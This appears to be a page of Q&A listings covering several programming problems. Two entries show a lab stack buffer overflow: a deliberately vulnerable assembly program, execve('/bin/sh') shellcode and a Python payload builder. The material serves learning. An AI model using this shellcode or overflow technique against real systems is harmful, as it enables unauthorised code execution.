    I want to get IQueryable<> result when executing stored procedure. Here is peace of code that works fine: IQueryable<SomeEntitiy> someEntities; var globbalyFilteredSomeEntities = from se in m_Entities.SomeEntitiy where se.GlobalFilter == 1234 select se; I can use this to apply global filter, and later use result in such way result = globbalyFilteredSomeEntities .OrderByDescending(se => se.CreationDate) .Skip(500) .Take(10); What I want to do - use some stored procedures in global filter. I tried: Add stored procedure to m_Entities, but it returns IEnumerable<> and executes sp immediately: var globbalyFilteredSomeEntities = from se in m_Entities.SomeEntitiyStoredProcedure(1234); Materialize query using EFExtensions library, but it is IEnumerable<>. If I use AsQueryable() and OrderBy(), Skip(), Take() and after that ToList() to execute that query - I get exception that DataReader is open and I need to close it first(can't paste error - it is in russian). var globbalyFilteredSomeEntities = m_Entities.CreateStoreCommand("exec SomeEntitiyStoredProcedure(1234)") .Materialize<SomeEntitiy>(); //.AsQueryable() //.OrderByDescending(se => se.CreationDate) //.Skip(500) //.Take(10) //.ToList(); Also just skipping .AsQueryable() is not helpful - same exception. When I put ToList() query executes, but it is too expensive to execute query without Skip(), Take().

    Read the article

  • Proper 'cleartool mkview' for ClearCase Snapshot view creation

    - by Jörg Battermann
    Good afternoon, seems like I am somewhat stuck in CC-land these days, but I have one (hopefully) final question regarding proper CC-handling: When using the CC View Creation Wizard with the two steps / details below, I can create a proper Snapshot view on my machine perfectly fine, however when trying to do the same with the mkview command, it fails... Here are the screenshots of the view creation wizard: Now that results into the (working) following view: cleartool> lsview battjo6r_view2 battjo6r_view2 \\Eh40yd4c\Views\battjo6r_view2.vws cleartool> lsview -long battjo6r_view2 Tag: battjo6r_view2 Global path: \\Eh40yd4c\Views\battjo6r_view2.vws Server host: Eh40yd4c Region: CT_WORK Active: NO View tag uuid:f34cf43f.b4d048df.845d.ed:21:a2:9c:45:ff View on host: Eh40yd4c View server access path: D:\Views\battjo6r_view2.vws View uuid: f34cf43f.b4d048df.845d.ed:21:a2:9c:45:ff View attributes: snapshot View owner: WW005\battjo6r However, when trying to create the view manually via mkview -snapshot -tag battjo6r_view2 -vws \\Eh40yd4c\Views\battjo6r_view2.vws -host Eh40yd4c -hpath D:\Views\battjo6r_view2.vws -gpath \\Eh40yd4c\Views\battjo6r_view2.vws battjo6r_view2 ... I get the following error: cleartool> mkview -snapshot -tag battjo6r_view2 -vws \\Eh40yd4c\Views\battjo6r_view2.vws -host Eh40yd4c -hpath D:\Views\battjo6r_view2.vws -gpath \\Eh40yd4c\Views\battjo6r_view2.vws battjo6r_view2 Created view. Host-local path: Eh40yd4c:D:\Views\battjo6r_view2.vws Global path: \\Eh40yd4c\Views\battjo6r_view2.vws cleartool: Error: Unable to find view by uuid:6f99f7ae.6a5d40e4.ba32.37:8e:e5:a4:ed:18, last known at "<viewhost>:<stg_path>". cleartool: Error: Unable to establish connection to snapshot view "6f99f7ae.6a5d40e4.ba32.37:8e:e5:a4:ed:18": ClearCase object not found cleartool: Warning: Unable to open snapshot view "D:\SnapShotViews\battjo6r_view2". cleartool: Error: Unable to create snapshot view "battjo6r_view2". Removing the view ... Any idea why this is happening? Am I missing something?

    Read the article

  • MVC App Works in Visual Studio, but not IIS7

    - by kesh
    Working on a an ASP.NET MVC Project, and I'm having some difficulties deploying to a shared dev server. Locally, when debugging using the local Visual Studio 2008 server, everything works peachy. However, once deployed, I receive the following error: Parser Error Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.## Heading ## Parser Error Message: Unable to find an entry point named 'BCryptGetFipsAlgorithmMode' in DLL 'bcrypt.dll'. Source Error: Line 1: <%@ Application Codebehind="Global.asax.cs" Inherits="APPLICATION_NAME.Web.MvcApplication" Language="C#" %> Source File: /APPLICATION_NAME/global.asax Line: 1 Version Information: Microsoft .NET Framework Version:2.0.50727.4927; ASP.NET Version:2.0.50727.4927 In the error log: Event sequence: 1 Event occurrence: 1 Event detail code: 0 Application information: Application domain: /LM/W3SVC/1/ROOT/APPLICATION_NAME-4-128995312096183595 Trust level: Full Application Virtual Path: /APPLICATION_NAME Application Path: E:\PROJECTS\APPLICATION\APPLICATION_NAME\APPLICATION_NAME\app\APPLICATION_NAME.Web\ Machine name: PC Process information: Process ID: 4608 Process name: w3wp.exe Account name: IIS APPPOOL\DefaultAppPool Exception information: Exception type: HttpException Exception message: Unable to find an entry point named 'BCryptGetFipsAlgorithmMode' in DLL 'bcrypt.dll'. Request information: Request URL: http://localhost/APPLICATION_NAME Request path: /APPLICATION_NAME User host address: ::1 User: Is authenticated: False Authentication Type: Thread account name: IIS APPPOOL\DefaultAppPool Thread information: Thread ID: 6 Thread account name: IIS APPPOOL\DefaultAppPool Is impersonating: False Stack trace: at System.Web.Compilation.BuildManager.ReportTopLevelCompilationException() at System.Web.Compilation.BuildManager.EnsureTopLevelFilesCompiled() at System.Web.Hosting.HostingEnvironment.Initialize(ApplicationManager appManager, IApplicationHost appHost, IConfigMapPathFactory configMapPathFactory, HostingEnvironmentParameters hostingParameters) Custom event details: After finding the deployment error, I tried adding an application locally, and that seems to result in the same application. On my local dev machine, I'm using Windows 7 RTM (x64), and on the shared server I'm running Windows Server 2008 Standard (x86). Poked around, and my FIPS encryption in Local Security Policy is disabled, so I'm at a bit of a loss.

    Read the article

  • Ruby through RVM fails

    - by TheLQ
    In constant battle to install Ruby 1.9.2 on an RPM system (OS is based off of CentOS), I'm trying again with RVM. So once I install it, I then try to use it: [root@quackwall ~]# rvm use 1.9.2 Using /usr/local/rvm/gems/ruby-1.9.2-p136 [root@quackwall ~]# ruby bash: ruby: command not found [root@quackwall ~]# which ruby /usr/bin/which: no ruby in (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin) Now that's interesting; rvm info says something completely different: [root@quackwall bin]# rvm info ruby-1.9.2-p136: system: uname: "Linux quackwall.highwow.lan 2.6.18-194.8.1.v5 #1 SMP Thu Jul 15 01:14:04 EDT 2010 i686 i686 i386 GNU/Linux" bash: "/bin/bash => GNU bash, version 3.2.25(1)-release (i686-redhat-linux-gnu)" zsh: " => not installed" rvm: version: "rvm 1.2.2 by Wayne E. Seguin ([email protected]) [http://rvm.beginrescueend.com/]" ruby: interpreter: "ruby" version: "1.9.2p136" date: "2010-12-25" platform: "i686-linux" patchlevel: "2010-12-25 revision 30365" full_version: "ruby 1.9.2p136 (2010-12-25 revision 30365) [i686-linux]" homes: gem: "/usr/local/rvm/gems/ruby-1.9.2-p136" ruby: "/usr/local/rvm/rubies/ruby-1.9.2-p136" binaries: ruby: "/usr/local/rvm/rubies/ruby-1.9.2-p136/bin/ruby" irb: "/usr/local/rvm/rubies/ruby-1.9.2-p136/bin/irb" gem: "/usr/local/rvm/rubies/ruby-1.9.2-p136/bin/gem" rake: "/usr/local/rvm/gems/ruby-1.9.2-p136/bin/rake" environment: PATH: "/usr/local/rvm/gems/ruby-1.9.2-p136/bin:/usr/local/rvm/gems/ruby-1.9.2-p136@global/bin:/usr/local/rvm/rubies/ruby-1.9.2-p136/bin:bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:/usr/local/rvm/bin" GEM_HOME: "/usr/local/rvm/gems/ruby-1.9.2-p136" GEM_PATH: "/usr/local/rvm/gems/ruby-1.9.2-p136:/usr/local/rvm/gems/ruby-1.9.2-p136@global" MY_RUBY_HOME: "/usr/local/rvm/rubies/ruby-1.9.2-p136" IRBRC: "/usr/local/rvm/rubies/ruby-1.9.2-p136/.irbrc" RUBYOPT: "" gemset: "" So I have RVM that says one thing and bash which says another. Any suggestions on how to get this working?

    Read the article

  • handling refrence to pointers/double pointers using SWIG [C++ to Java]

    - by Siddu
    My code has an interface like class IExample { ~IExample(); //pure virtual methods ...}; a class inheriting the interface like class CExample : public IExample { protected: CExample(); //implementation of pure virtual methods ... }; and a global function to create object of this class - createExample( IExample *& obj ) { obj = new CExample(); } ; Now, I am trying to get Java API wrapper using SWIG, the SWIG generated interface has a construcotr like - IExample(long cPtr, boolean cMemoryOwn) and global function becomes createExample(IExample obj ) The problem is when i do, IExample exObject = new IExample(LogFileLibraryJNI.new_plong(), true /*or false*/ ); createExample( exObject ); The createExample(...) API at C++ layer succesfully gets called, however, when call returns to Java layer, the cPtr (long) variable does not get updated. Ideally, this variable should contain address of CExample object. I read in documentation that typemaps can be used to handle output parameters and pointer references as well; however, I am not able to figure out the suitable way to use typemaps to resolve this problem, or any other workaround. Please suggest if i am doing something wrong, or how to use typemap in such situation?

    Read the article

  • ASP.NET MVC 2 with NServiceBus unable to load requested types

    - by dp
    I am trying to use NServiceBus with an ASP.NET MVC 2 website (using VS 2010 and the .NET 4.0 framework). However, when I run the site on my local machine, I get the following error: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information. Here are the relevant steps I have taken: Downloaded the NServiceBus.2.0.0.1145 binaries In my asp.net mvc app, I've added references to NServiceBus.dll and NServiceBus.Core.dll In Global.asax.cs I've added: public static IBus Bus { get; private set; } protected void Application_Start() { AreaRegistration.RegisterAllAreas(); RegisterRoutes(RouteTable.Routes); Bus = NServiceBus.Configure .WithWeb() .Log4Net() .DefaultBuilder() .XmlSerializer() .MsmqTransport() .IsTransactional(false) .PurgeOnStartup(false) .UnicastBus() .ImpersonateSender(false) .CreateBus() .Start(); } In web.config, I've added: <MsmqTransportConfig InputQueue="MyWebClient" ErrorQueue="error" NumberOfWorkerThreads="1" MaxRetries="5"/> <UnicastBusConfig> <MessageEndpointMappings> <add Messages="Messages" Endpoint="MyServerInputQueue"/> </MessageEndpointMappings> </UnicastBusConfig> The error indicates that the problem is with the first line in the Global.asax.cs file. Is it possible that there is a problem with NServiceBus running under .NET 4.0?

    Read the article

  • wp_get_archives(cat=id) <-- Any way to specifiy cat id in archives?

    - by Matrym
    Does anyone know how to specify an INCLUDE ONLY category using wp_get_archives? I would like to specify a category but then list results by month. I've tried kwebble's plugin to no avail. I've also found the following on WP forums, but it appears to only exclude categories. Perhaps it can be modified to do include? Even given that, I'm not sure how I would call it... Thanks in advance! add_filter( 'getarchives_where', 'customarchives_where' ); add_filter( 'getarchives_join', 'customarchives_join' ); function customarchives_join( $x ) { global $wpdb; return $x . " INNER JOIN $wpdb->term_relationships ON ($wpdb->posts.ID = $wpdb->term_relationships.object_id) INNER JOIN $wpdb->term_taxonomy ON ($wpdb->term_relationships.term_taxonomy_id = $wpdb->term_taxonomy.term_taxonomy_id)"; } function customarchives_where( $x ) { global $wpdb; $exclude = '1'; // category id to exclude return $x . " AND $wpdb->term_taxonomy.taxonomy = 'category' AND $wpdb->term_taxonomy.term_id NOT IN ($exclude)";

    Read the article

  • Practical value for concurrent-request-timeout parameter

    - by Andrei
    In the Seam Reference Guide, one can find this paragraph: We can set a sensible default for the concurrent request timeout (in ms) in components.xml: <core:manager concurrent-request-timeout="500" /> However, we found that 500 ms is not nearly enough time for most of the cases we had to deal with, especially with the severe restriction seam places on conversation access. In our application we have a combination of page scoped ajax requests (triggered by various use actions), some global scoped polling notification logic (part of the header, so included in every page) and regular links that invoke actions and/or navigate to other pages. Therefore, we get the dreaded concurrent access to conversation exception way too often, even without any significant load on the site. After researching the options for quite a bit, we ended up bumping this value to several seconds (we're debating whether to bump it up to 10s), as none of the recommended solutions seemed able to solve our issue completely (even forcing a global queue for all the ajax requests would still leave us exposed to a user deciding to click a link right when one of our polling calls was in progress). And we'd much rather have the users wait for a second or two instead of getting an error page just because they clicked a link at the wrong moment. And now to the question: is there something obvious we're missing (like a way to allow concurrent access to conversations and taking care of the needed locking ourselves, for instance :)? How do people solve this problem (ajax requests mixed with user driven interaction) in seam? Disabling all the links on the page while ajax requests are in progress (as suggested by one blog page) is really not a viable option. Any other suggestions? TIA, Andrei

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Create Jinja2 macros that put content in separate places

    - by Brian M. Hunt
    I want to create a table of contents and endnotes in a Jinja2 template. How can one accomplish these tasks? For example, I want to have a template as follows: {% block toc %} {# ... the ToC goes here ... #} {% endblock %} {% include "some other file with content.jnj" %} {% block endnotes %} {# ... the endnotes go here ... #} {% endblock %} Where the some other file with content.jnj has content like this: {% section "One" %} Title information for Section One (may be quite long); goes in Table of Contents ... Content of section One {% section "Two" %} Title information of Section Two (also may be quite long) <a href="#" id="en1">EndNote 1</a> <script type="text/javsacript">...(may be reasonably long) </script> {# ... Everything up to here is included in the EndNote #} Where I say "may be quite/reasonably long" I mean to say that it can't reasonably be put into quotes as an argument to a macro or global function. I'm wondering if there's a pattern for this that may accommodate this, within the framework of Jinja2. My initial thought is to create an extension, so that one can have a block for sections and end-notes, like-so: {% section "One" %} Title information goes here. {% endsection %} {% endnote "one" %} <a href="#">...</a> <script> ... </script> {% endendnote %} Then have global functions (that pass in the Jinja2 Environment): {{ table_of_contents() }} {% include ... %} {{ endnotes() }} However, while this will work for endnotes, I'd presume it requires a second pass by something for the table of contents. Thank you for reading. I'd be much obliged for your thoughts and input. Brian

    Read the article

  • refering Tomcat JNDI datasource in persistence.xml

    - by binary_runner
    in server.xml I've defined global resource (I'm using Tomcat 6): <GlobalNamingResources> <Resource name="jdbc/myds" auth="Container" type="javax.sql.DataSource" maxActive="10" maxIdle="3" maxWait="10000" username="sa" password="" driverClassName="org.h2.Driver" url="jdbc:h2:~/.myds/data/db" /> </GlobalNamingResources> I see in catalina.out that this is bound, so I suppose it's OK. In my web app I have the link to the datasource, I'm not sure it's OK: <Context> <ResourceLink global='jdbc/myds' name='jdbc/myds' type="javax.sql.Datasource"/> </Context> and in application there is persistence.xml : <persistence xmlns="http://java.sun.com/xml/ns/persistence" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/persistence http://java.sun.com/xml/ns/persistence/persistence_2_0.xsd" version="2.0"> <persistence-unit name="oam" transaction-type="RESOURCE_LOCAL"> <provider>org.hibernate.ejb.HibernatePersistence</provider> <non-jta-data-source>jdbc/myds</non-jta-data-source> <!-- class definitions here, nothing else --> <properties> <property name="hibernate.dialect" value="org.hibernate.dialect.H2Dialect"/> </properties> </persistence-unit> </persistence> It shuld be OK, but most probably this or the ResourceLink definition is wrong because I'm getting: javax.naming.NameNotFoundException: Name jdbc is not bound in this Context What's wrong and why this does not work ?

    Read the article

  • fork() within a fork()

    - by codingfreak
    Hi Is there any way to differentiate the child processes created by different fork() functions within a program. global variable i; SIGCHLD handler function() { i--; } handle() { fork() --> FORK2 } main() { while(1) { if(i<5) { i++; if( (fpid=fork())==0) --> FORK1 handle() else (fpid>0) ..... } } } Is there any way I can differentiate between child processes created by FORK1 and FORK2 ?? because I am trying to decrement the value of global variable 'i' in SIGCHLD handler function and it should be decremented only for the processes created by FORK1 .. I tried to use an array and save the process id [this code is placed in fpid0 part] of the child processes created by FORK1 and then decrement the value of 'i' only if the process id of dead child is within the array ... But this didn't work out as sometimes child processes dead so fastly that updating the array is not done perfectly and everything messed up. So is there any better solution for this problem ??

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • How to use Castle Windsor with ASP.Net web forms?

    - by Xian
    I am trying to wire up dependency injection with Windsor to standard asp.net web forms. I think I have achieved this using a HttpModule and a CustomAttribute (code shown below), although the solution seems a little clunky and was wondering if there is a better supported solution out of the box with Windsor? There are several files all shown together here // index.aspx.cs public partial class IndexPage : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { Logger.Write("page loading"); } [Inject] public ILogger Logger { get; set; } } // WindsorHttpModule.cs public class WindsorHttpModule : IHttpModule { private HttpApplication _application; private IoCProvider _iocProvider; public void Init(HttpApplication context) { _application = context; _iocProvider = context as IoCProvider; if(_iocProvider == null) { throw new InvalidOperationException("Application must implement IoCProvider"); } _application.PreRequestHandlerExecute += InitiateWindsor; } private void InitiateWindsor(object sender, System.EventArgs e) { Page currentPage = _application.Context.CurrentHandler as Page; if(currentPage != null) { InjectPropertiesOn(currentPage); currentPage.InitComplete += delegate { InjectUserControls(currentPage); }; } } private void InjectUserControls(Control parent) { if(parent.Controls != null) { foreach (Control control in parent.Controls) { if(control is UserControl) { InjectPropertiesOn(control); } InjectUserControls(control); } } } private void InjectPropertiesOn(object currentPage) { PropertyInfo[] properties = currentPage.GetType().GetProperties(); foreach(PropertyInfo property in properties) { object[] attributes = property.GetCustomAttributes(typeof (InjectAttribute), false); if(attributes != null && attributes.Length > 0) { object valueToInject = _iocProvider.Container.Resolve(property.PropertyType); property.SetValue(currentPage, valueToInject, null); } } } } // Global.asax.cs public class Global : System.Web.HttpApplication, IoCProvider { private IWindsorContainer _container; public override void Init() { base.Init(); InitializeIoC(); } private void InitializeIoC() { _container = new WindsorContainer(); _container.AddComponent<ILogger, Logger>(); } public IWindsorContainer Container { get { return _container; } } } public interface IoCProvider { IWindsorContainer Container { get; } }

    Read the article

  • Output redirection still with colors in PowerShell

    - by stej
    Suppose I run msbuild like this: function Clean-Sln { param($sln) MSBuild.exe $sln /target:Clean } Clean-Sln c:\temp\SO.sln In Posh console the output is in colors. That's pretty handy - you spot colors just by watching the output. And e.g. not important messages are grey. Question I'd like to add ability to redirect it somewhere like this (simplified example): function Clean-Sln { param($sln) MSBuild.exe $sln /target:Clean | Redirect-AccordingToRedirectionVariable } $global:Redirection = 'Console' Clean-Sln c:\temp\SO.sln $global:Redirection = 'TempFile' Clean-Sln c:\temp\Another.sln If I use 'Console', the cmdlet/function Redirect-AccordingToRedirectionVariable should output the msbuild messages with colors the same way as the output was not piped. In other words - it should leave the output as it is. If I use 'TempFile', Redirect-AccordingToRedirectionVariable will store the output in a temp file. Is it even possible? I guess it is not :| Or do you have any advice how to achieve the goal? Possible solution: if ($Redirection -eq 'Console) { MSBuild.exe $sln /target:Clean | Redirect-AccordingToRedirectionVariable } else { MSBuild.exe $sln /target:Clean | Out-File c:\temp.txt } But if you imagine there can be many many msbuild calls, it's not ideal. Don't be shy to tell me any new suggestion how to cope with it ;) Any background info about redirections/coloring/outpu is welcome as well. (The problem is not msbuild specific, the problem touches any application that writes colored output)

    Read the article

< Previous Page | 89 90 91 92 93 94 95 96 97 98 99 100  | Next Page >